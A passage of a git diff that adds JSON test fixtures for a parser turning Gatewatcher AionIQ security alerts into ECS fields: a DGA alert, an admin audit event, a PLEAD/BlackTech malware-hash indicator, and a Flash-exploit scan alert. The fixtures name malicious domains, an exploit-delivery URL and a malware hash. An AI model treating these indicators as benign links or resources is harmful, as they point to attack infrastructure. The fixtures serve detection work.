     \"ppyblaohb.com\",\n      \"khllpmpmare.com\",\n      \"lttulzaiaoctpa7.com\",\n      \"jetuergatod.com\",\n      \"riaaiysk.com\",\n      \"anxsmqyfy.com\",\n      \"tqjhvylf.com\",\n      \"vdunsygwoktx.com\",\n      \"jhghrlufoh.com\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n    \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n    \"kind\": \"alert\",\n    \"module\": \"dga_detect\",\n    \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"dataset\": \"alert\",\n    \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"network\": {\n    \"protocol\": \"dns\",\n    \"transport\": \"udp\",\n    \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n    \"flow_id\": 1434780527372168\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"ip\": \"27.0.0.227\"\n  },\n  \"destination\": {\n    \"port\": 53,\n    \"ip\": \"202.129.215.23\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"dga\": {\n    \"dga_count\": 35,\n    \"dga_ratio\": 0.97,\n    \"malware_behavior_confidence\": 50,\n    \"nx_domain_count\": 36,\n    \"top_DGA\": [\n      \"zmhaoyukbol6a.com\",\n      \"ppyblaohb.com\",\n      \"khllpmpmare.com\",\n      \"lttulzaiaoctpa7.com\",\n      \"jetuergatod.com\",\n      \"riaaiysk.com\",\n      \"anxsmqyfy.com\",\n      \"tqjhvylf.com\",\n      \"vdunsygwoktx.com\",\n      \"jhghrlufoh.com\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n    \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n    \"kind\": \"alert\",\n    \"module\": \"dga_detect\",\n    \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"dataset\": \"alert\",\n    \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n  }\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "dga_detect",
+      "severity": 1
+    },
+    "@timestamp": "2024-09-11T09:16:33.314331Z",
+    "destination": {
+      "address": "202.129.215.23",
+      "ip": "202.129.215.23",
+      "port": 53
+    },
+    "gatewatcher": {
+      "dga": {
+        "dga_count": "35",
+        "dga_ratio": "0.97",
+        "malware_behavior_confidence": "50",
+        "nx_domain_count": "36",
+        "top_DGA": [
+          "anxsmqyfy.com",
+          "jetuergatod.com",
+          "jhghrlufoh.com",
+          "khllpmpmare.com",
+          "lttulzaiaoctpa7.com",
+          "ppyblaohb.com",
+          "riaaiysk.com",
+          "tqjhvylf.com",
+          "vdunsygwoktx.com",
+          "zmhaoyukbol6a.com"
+        ]
+      },
+      "event": {
+        "created": "2024-09-11T09:16:33.194964Z",
+        "id": "0ec85c0d-68b6-4602-b26e-d0966d5e1b9d"
+      },
+      "network": {
+        "flow_id": 1434780527372168,
+        "timestamp": "2024-09-11T09:15:25.886786Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "version": "1"
+    },
+    "network": {
+      "protocol": "dns",
+      "transport": "udp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "202.129.215.23",
+        "27.0.0.227"
+      ]
+    },
+    "source": {
+      "address": "27.0.0.227",
+      "ip": "27.0.0.227"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json
new file mode 100644
index 000000000..a043a3805
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/history.json
@@ -0,0 +1,52 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"dataset\": \"administration\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"history\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"history\": {\n    \"type\": \"user\",\n    \"name\": \"pierre.pocry\",\n    \"id\": 18,\n    \"ip\": \"192.192.32.12\",\n    \"content\": {},\n    \"method\": \"POST\",\n    \"endpoint\": \"/gum/configuration\",\n    \"code\": \"200\"\n  },\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"dataset\": \"administration\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"history\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"history\": {\n    \"type\": \"user\",\n    \"name\": \"pierre.pocry\",\n    \"id\": 18,\n    \"ip\": \"192.192.32.12\",\n    \"content\": {},\n    \"method\": \"POST\",\n    \"endpoint\": \"/gum/configuration\",\n    \"code\": \"200\"\n  },\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "administration",
+      "kind": "event",
+      "module": "history"
+    },
+    "@timestamp": "2022-09-01T16:06:51.664000Z",
+    "gatewatcher": {
+      "event": {
+        "id": "8223b432-7e97-4570-a29d-254f41dbb9db"
+      },
+      "history": {
+        "code": 200,
+        "content": "{}",
+        "endpoint": "/gum/configuration",
+        "id": 18,
+        "ip": "192.192.32.12",
+        "method": "POST",
+        "name": "pierre.pocry",
+        "type": "user"
+      },
+      "observer": {
+        "log_format_version": "1.0.0"
+      }
+    },
+    "observer": {
+      "hostname": "gcenter-interne-rd-56.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-interne-rd-56.gatewatcher.com"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
new file mode 100644
index 000000000..190c98114
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
@@ -0,0 +1,96 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"product\": \"lastinfosec\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"enrichment\",\n    \"dataset\": \"ioc\",\n    \"category\": [\n      \"network\",\n      \"threat\"\n    ],\n    \"module\": \"ioc\",\n    \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"created\": \"2019-10-23T05:33:54+00:00\",\n    \"severity\": 2,\n    \"severity_human\": \"High suspicious\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ioc\": {\n    \"tlp\": \"green\",\n    \"type\": \"SHA256\",\n    \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n    \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n    \"relations\": [\n      \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n      \"b57f419e-8b12-49d3-886b-145383725dcd\"\n    ],\n    \"ttp\": [],\n    \"families\": [\n      \"PLEAD\"\n    ],\n    \"campaigns\": [],\n    \"categories\": [\n      \"malware\",\n      \"trojan\"\n    ],\n    \"threat_actor\": [\n      \"BlackTech\"\n    ],\n    \"targeted_sectors\": [],\n    \"targeted_organizations\": [],\n    \"targeted_platforms\": [],\n    \"targeted_countries\": [],\n    \"vulnerabilities\": [],\n    \"kill_chain_phases\": [],\n    \"meta_data\": {\n      \"cwe\": [],\n      \"descriptions\": [],\n      \"usageMode\": \"detection\"\n    },\n    \"usage_mode\": \"detection\",\n    \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n    \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n    \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n    \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n    \"tags\": [\n      \"troj_fr.df33c1bd\",\n      \"trojan.plead.win32.33\",\n      \"gen:variant.graftor.598952 (b)\",\n      \"generic backdoor.gy\",\n      \"win32/plead.au trojan\",\n      \"trojan/plead!exyhr4fe\",\n      \"trojan.win32.plead.fqunov\",\n      \"tr/plead.mysge\",\n      \"trojan.win32.plead\",\n      \"trojan ( 0055a46c1 )\",\n      \"malware\",\n      \"trojan.win32.plead.aa\",\n      \"trojan/win32.plead\"\n    ],\n    \"external_links\": [\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n      },\n      {\n        \"source_name\": \"any.run_report\",\n        \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n      }\n    ]\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"product\": \"lastinfosec\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"enrichment\",\n    \"dataset\": \"ioc\",\n    \"category\": [\n      \"network\",\n      \"threat\"\n    ],\n    \"module\": \"ioc\",\n    \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"created\": \"2019-10-23T05:33:54+00:00\",\n    \"severity\": 2,\n    \"severity_human\": \"High suspicious\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ioc\": {\n    \"tlp\": \"green\",\n    \"type\": \"SHA256\",\n    \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n    \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n    \"relations\": [\n      \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n      \"b57f419e-8b12-49d3-886b-145383725dcd\"\n    ],\n    \"ttp\": [],\n    \"families\": [\n      \"PLEAD\"\n    ],\n    \"campaigns\": [],\n    \"categories\": [\n      \"malware\",\n      \"trojan\"\n    ],\n    \"threat_actor\": [\n      \"BlackTech\"\n    ],\n    \"targeted_sectors\": [],\n    \"targeted_organizations\": [],\n    \"targeted_platforms\": [],\n    \"targeted_countries\": [],\n    \"vulnerabilities\": [],\n    \"kill_chain_phases\": [],\n    \"meta_data\": {\n      \"cwe\": [],\n      \"descriptions\": [],\n      \"usageMode\": \"detection\"\n    },\n    \"usage_mode\": \"detection\",\n    \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n    \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n    \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n    \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n    \"tags\": [\n      \"troj_fr.df33c1bd\",\n      \"trojan.plead.win32.33\",\n      \"gen:variant.graftor.598952 (b)\",\n      \"generic backdoor.gy\",\n      \"win32/plead.au trojan\",\n      \"trojan/plead!exyhr4fe\",\n      \"trojan.win32.plead.fqunov\",\n      \"tr/plead.mysge\",\n      \"trojan.win32.plead\",\n      \"trojan ( 0055a46c1 )\",\n      \"malware\",\n      \"trojan.win32.plead.aa\",\n      \"trojan/win32.plead\"\n    ],\n    \"external_links\": [\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n      },\n      {\n        \"source_name\": \"any.run_report\",\n        \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n      }\n    ]\n  }\n}",
+    "event": {
+      "category": [
+        "network",
+        "threat"
+      ],
+      "dataset": "ioc",
+      "kind": "enrichment",
+      "module": "ioc",
+      "severity": 2
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2019-10-23T05:33:54Z",
+        "id": "3713d994-1db4-40ff-abe9-2f43bac7b5fa"
+      },
+      "ioc": {
+        "campaigns": [],
+        "case_id": "21615052-7cf3-48cd-9aff-36a61e45528c",
+        "categories": [
+          "malware",
+          "trojan"
+        ],
+        "creation_date": "2019-10-23T05:33:54Z",
+        "description": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\nWe advised to use this IoC in detection mode.",
+        "external_links": [
+          "{\"source_name\": \"Twitter\", \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}",
+          "{\"source_name\": \"Twitter\", \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}",
+          "{\"source_name\": \"Twitter\", \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}",
+          "{\"source_name\": \"Twitter\", \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"}",
+          "{\"source_name\": \"any.run_report\", \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"}"
+        ],
+        "families": [
+          "PLEAD"
+        ],
+        "kill_chain_phases": [],
+        "meta_data": {
+          "cwe": [],
+          "descriptions": [],
+          "usageMode": "detection"
+        },
+        "package_date": "2023-04-07T05:00:02.362356Z",
+        "relations": [
+          "6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+          "b57f419e-8b12-49d3-886b-145383725dcd"
+        ],
+        "signature": "SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa",
+        "tags": [
+          "gen:variant.graftor.598952 (b)",
+          "generic backdoor.gy",
+          "malware",
+          "tr/plead.mysge",
+          "troj_fr.df33c1bd",
+          "trojan ( 0055a46c1 )",
+          "trojan.plead.win32.33",
+          "trojan.win32.plead",
+          "trojan.win32.plead.aa",
+          "trojan.win32.plead.fqunov",
+          "trojan/plead!exyhr4fe",
+          "trojan/win32.plead",
+          "win32/plead.au trojan"
+        ],
+        "targeted_countries": [],
+        "targeted_organizations": [],
+        "targeted_platforms": [],
+        "targeted_sectors": [],
+        "threat_actor": [
+          "BlackTech"
+        ],
+        "tlp": "green",
+        "type": "SHA256",
+        "updated_date": "2023-04-07T04:10:34Z",
+        "usage_mode": "detection",
+        "value": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4"
+      },
+      "observer": {
+        "log_format_version": "1.0.0"
+      }
+    },
+    "observer": {
+      "product": "lastinfosec",
+      "vendor": "gatewatcher"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json
new file mode 100644
index 000000000..068b58407
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json
@@ -0,0 +1,154 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"202.129.215.251\"\n  },\n  \"file\": {\n    \"magic\": \"Macromedia Flash data (compressed), version 13\",\n    \"sid\": [\n      1100020\n    ],\n    \"hash\": {\n      \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n    },\n    \"name\": \"/\",\n    \"file_id\": 219,\n    \"tx_id\": 2,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 55351,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n  \"malcore\": {\n    \"file_type\": \"application/x-shockwave-flash\",\n    \"analyzers_up\": 16,\n    \"analyzed_clean\": 9,\n    \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n    \"state\": \"Infected\",\n    \"total_found\": \"3/16\",\n    \"detail_scan_time\": 373,\n    \"reporting_token\": \"\",\n    \"analyzed_infected\": 3,\n    \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n    \"analyzed_suspicious\": 0,\n    \"analyzed_error\": 0,\n    \"processing_time\": 1576,\n    \"engine_id\": {\n      \"5\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c18ab9n\"\n      },\n      \"8\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"Exploit.Flash\",\n        \"id\": \"ib54e9s\"\n      },\n      \"4\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"c10195e\"\n      },\n      \"14\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"t3114fn\"\n      },\n      \"13\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"sde882s\"\n      },\n      \"9\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"kfb8487\"\n      },\n      \"12\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"qb9308l\"\n      },\n      \"10\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"mb2b5fe\"\n      },\n      \"0\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"a32935b\"\n      },\n      \"15\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"we9a17t\"\n      },\n      \"6\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c81e55c\"\n      },\n      \"7\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"\",\n        \"id\": \"e83bf1t\"\n      },\n      \"3\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"b557a5r\"\n      },\n      \"1\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"EXP/Flash.EB.502\",\n        \"id\": \"acf9bba\"\n      },\n      \"11\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"Unavailable (permanently_failed)\",\n        \"id\": \"n00000e\"\n      },\n      \"2\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"SWF/Exploit\",\n        \"id\": \"af7872b\"\n      }\n    },\n    \"detail_wait_time\": 660,\n    \"file_type_description\": \"Macromedia Flash Player\",\n    \"code\": 1,\n    \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n    \"analyzed_other\": 4\n  },\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1779492455056060\n  },\n  \"destination\": {\n    \"port\": 47858,\n    \"ip\": \"27.0.0.144\"\n  },\n  \"url\": {\n    \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n  },\n  \"user_agent\": {\n    \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"version\": \"HTTP/1.1\",\n    \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/x-shockwave-flash\",\n      \"bytes\": 55351\n    }\n  },\n  \"event\": {\n    \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n    \"kind\": \"alert\",\n    \"module\": \"malcore\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T09:15:23.329615+0000\",\n    \"dataset\": \"alert\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"202.129.215.251\"\n  },\n  \"file\": {\n    \"magic\": \"Macromedia Flash data (compressed), version 13\",\n    \"sid\": [\n      1100020\n    ],\n    \"hash\": {\n      \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n    },\n    \"name\": \"/\",\n    \"file_id\": 219,\n    \"tx_id\": 2,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 55351,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n  \"malcore\": {\n    \"file_type\": \"application/x-shockwave-flash\",\n    \"analyzers_up\": 16,\n    \"analyzed_clean\": 9,\n    \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n    \"state\": \"Infected\",\n    \"total_found\": \"3/16\",\n    \"detail_scan_time\": 373,\n    \"reporting_token\": \"\",\n    \"analyzed_infected\": 3,\n    \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n    \"analyzed_suspicious\": 0,\n    \"analyzed_error\": 0,\n    \"processing_time\": 1576,\n    \"engine_id\": {\n      \"5\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c18ab9n\"\n      },\n      \"8\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"Exploit.Flash\",\n        \"id\": \"ib54e9s\"\n      },\n      \"4\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"c10195e\"\n      },\n      \"14\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"t3114fn\"\n      },\n      \"13\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"sde882s\"\n      },\n      \"9\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"kfb8487\"\n      },\n      \"12\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"qb9308l\"\n      },\n      \"10\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"mb2b5fe\"\n      },\n      \"0\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"a32935b\"\n      },\n      \"15\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"we9a17t\"\n      },\n      \"6\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c81e55c\"\n      },\n      \"7\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"\",\n        \"id\": \"e83bf1t\"\n      },\n      \"3\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"b557a5r\"\n      },\n      \"1\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"EXP/Flash.EB.502\",\n        \"id\": \"acf9bba\"\n      },\n      \"11\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"Unavailable (permanently_failed)\",\n        \"id\": \"n00000e\"\n      },\n      \"2\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"SWF/Exploit\",\n        \"id\": \"af7872b\"\n      }\n    },\n    \"detail_wait_time\": 660,\n    \"file_type_description\": \"Macromedia Flash Player\",\n    \"code\": 1,\n    \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n    \"analyzed_other\": 4\n  },\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1779492455056060\n  },\n  \"destination\": {\n    \"port\": 47858,\n    \"ip\": \"27.0.0.144\"\n  },\n  \"url\": {\n    \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n  },\n  \"user_agent\": {\n    \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    